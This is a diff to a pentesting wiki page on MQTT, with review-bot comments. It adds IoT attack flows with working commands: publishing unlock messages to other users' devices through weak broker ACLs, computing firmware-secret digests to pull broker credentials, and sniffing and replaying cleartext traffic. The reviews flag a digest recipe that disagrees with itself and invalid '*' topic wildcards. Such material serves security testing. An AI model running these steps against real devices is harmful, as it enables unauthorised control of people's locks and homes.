102 changes: 100 additions & 2 deletions src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
Expand Up @@ -116,11 +116,109 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
- DISCONNECT (14): Initiated by the client to terminate the connection.
- Two values, 0 and 15, are marked as reserved and their use is forbidden.

## IoT/MQTT attack patterns (broker ACLs, cloud APIs, cleartext transport)

The following practical attack flows are commonly seen in consumer IoT stacks that rely on cloud MQTT brokers and mobile apps.

### 1) Predictable device IDs + weak broker ACLs = cross-account control

Many vendors authorize publish/subscribe access based only on the topic pattern, not on device ownership. If device IDs are predictable (e.g., equal to the device MAC), an attacker can control other users’ devices by publishing to their control topics.

- Typical topic layout:
- Control: `/vendor/<deviceId>/tx`
- Status: `/vendor/<deviceId>/rx`
- Finding device IDs:
- Local sniffing: capture Wi‑Fi frames to learn the hub/device MAC (e.g., with airodump-ng).
- Firmware/UART: boot logs or binaries often print/contain the device ID/MAC.
- Test for weak ACLs by publishing to a foreign deviceId while authenticated with any valid account/broker credentials:

```bash
# Example using mosquitto_pub (plaintext MQTT on a nonstandard port, adjust host/port)
mosquitto_pub -h mq.example.com -p 8001 \
-i "APP-123456" -u "appUser" -P "appPass" \
-t "/vendor/d88bCAFEBABE/tx" \
-m '{"method":"Device.setState","params":{"state":{"lock":"unlocked"}},"targetDevice":"d88bCAFEBABE"}' -d
```

Notes
- If the action succeeds and you are not the owner of the target device, the broker is missing per-device authorization.
- Predictable IDs are frequently MAC-based (check the device OUI) or derived from serials.

### 2) Cloud API credential harvest via firmware-derived secret

Some ecosystems expose undocumented cloud endpoints that return per-device MQTT credentials when given a deviceId plus a digest derived from a hardcoded secret. Reverse engineer the firmware to recover the secret and reproduce the digest.

- Reverse engineering hints:
- Search for HTTP client code and strings like "/pf/", "/cfg/", "mqtt", "md5", "sha1", "token".
- Look for code building a string `sprintf("%s_%s", deviceId, SECRET)` then hashing it.
- Dumped secrets are often reused across models/regions.
- See also the Firmware Analysis page for extracting and reversing device images:

{{#ref}}
../hardware-physical-access/firmware-analysis/README.md
{{#endref}}

- Reproduce the digest and pull credentials:

```bash
# Example: compute uppercased MD5 of <deviceId><secret>
SECRET="cf50DEADBEEF"; DEV="d88bCAFEBABE";
echo -n "${DEV}${SECRET}" | md5sum | awk '{print toupper($1)}'
# -> 100B65ABCDEF...

# Query the cloud endpoint with deviceId and MD5
curl -s "https://api.example.com/pf/${DEV}/100B65ABCDEF" | jq .
# Expect JSON containing broker URL, clientId/username/password, etc.
```

- Abuse the harvested credentials to subscribe to privileged/admin topics that may leak sensitive info or accept control commands:

```bash
mosquitto_sub -h mq.example.com -p 8001 \
-i "SG-${DEV}" -u "${DEV}" -P "<brokerPwd>" \
-t "ylgw*/admin" -v
# Look for Wi‑Fi SSID/password pushes, pairing tokens, debug commands, etc.
```

### 3) Exploiting cleartext MQTT transport (no TLS)

Plaintext MQTT makes credential and payload interception trivial on-path or locally:

- Indicators in captures: strings like "MQTT" or legacy "MQIsdp", clear-text clientId/username/password and topic names.
- Observe and replay commands captured on TCP/1883 or vendor-specific plaintext ports (e.g., 8001):

```bash
# Sniff
sudo tcpdump -i <IFACE> -A -s0 'tcp port 1883 or tcp port 8001'
# Replay a captured control message
mosquitto_pub -h mq.example.com -p 8001 -i "APP-..." -u "..." -P "..." \
-t "/vendor/<deviceId>/tx" -m '<captured JSON>'
```

If broker ACLs are weak (see 1), cleartext transport amplifies impact by enabling credential reuse and offline analysis.

### 4) Abusing long-lived sessions/tokens

If logout does not invalidate tokens, old MQTT credentials may keep working for days/weeks. Test by reusing historical clientId/username/password values in your MQTT client even after user logout/app reinstall. Some brokers are lax about clientId formats (e.g., overly long IDs or unexpected characters) and will still accept/route messages.

### Detection and hardening ideas

- Enforce per-device ACLs on the broker (e.g., allow publish to `/vendor/<ownDeviceId>/tx` only for the device owner account).
- Make device IDs non-predictable and never equal to MACs/serials; validate `targetDevice` fields server-side.
- Remove undocumented endpoints that mint credentials from easily-derived digests; use HMAC with rotated secrets if needed.
- Require TLS for all MQTT clients (hubs, apps) and validate server certs.
- Shorten session/token lifetimes and invalidate them on logout.
- Network monitoring: alert on outbound plaintext MQTT (tcp/1883 or vendor ports like 8001) and on suspicious topics (e.g., `*/admin`, `/vendor/*/(tx|rx)`).

## Shodan

- `port:1883 MQTT`

{{#include ../banners/hacktricks-training.md}}

## References

- [YoSmart YoLink Hub version 0382 (Bishop Fox)](https://bishopfox.com/blog/yosmart-yolink-hub-version-0382)
- [Aircrack-ng (airodump-ng)](https://www.aircrack-ng.org/)
- [Ghidra SRE](https://ghidra-sre.org/)
- [Eclipse Mosquitto clients](https://mosquitto.org/)

{{#include ../banners/hacktricks-training.md}}
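Review bot: the digest recipe in the bash block disagrees with the reverse-engineering hint two bullets above it: the hint says the firmware builds `sprintf("%s_%s", deviceId, SECRET)` (underscore separator), but the script hashes `"${DEV}${SECRET}"` with no separator, and the curl call then hardcodes `100B65ABCDEF` instead of reusing the computed value. Suggest one consistent form, e.g. `DIGEST=$(echo -n "${DEV}_${SECRET}" | md5sum | awk '{print toupper($1)}')` followed by `curl -s "https://api.example.com/pf/${DEV}/${DIGEST}" | jq .`, or correct the hint to match whichever concatenation the target actually uses. Separately, `*` is not an MQTT topic wildcard: the `-t "ylgw*/admin"` filter in the mosquitto_sub example and the `*/admin` pattern in the monitoring bullet only match a literal `*`; MQTT filters use `+` for one level and `#` for the remainder, and a wildcard must occupy a whole level (`+/admin`, `ylgw/#`), so either spell out the real prefix or use `+/admin` and say the glob is illustrative. Also, `{{#include ../banners/hacktricks-training.md}}` now appears both before `## References` and at the end of the file; keep only the closing one unless the double banner is intentional. Minor: the bare `Notes` line before the two bullets should be a heading or a bold lead-in in the file's style.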
3 changes: 1 addition & 2 deletions src/welcome/hacktricks-values-and-faq.md
Expand Up @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con

> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**

As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
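Review bot: the edited TIP line drops the verb and now reads `How can I a page of HackTricks?`; this looks like an accidental deletion rather than an intended change (the answer below still describes how to cite), so restore it: `> - **How can I cite a page of HackTricks?**`.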
Expand Down Expand Up @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the

{{#include ../banners/hacktricks-training.md}}
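Review bot: this hunk only removes one line before the final include (old span 4 lines, new 3) and no content change is visible, so it reads as a stray blank-line cleanup; fine as is, but it is unrelated to the MQTT additions and could be split out to keep the change focused.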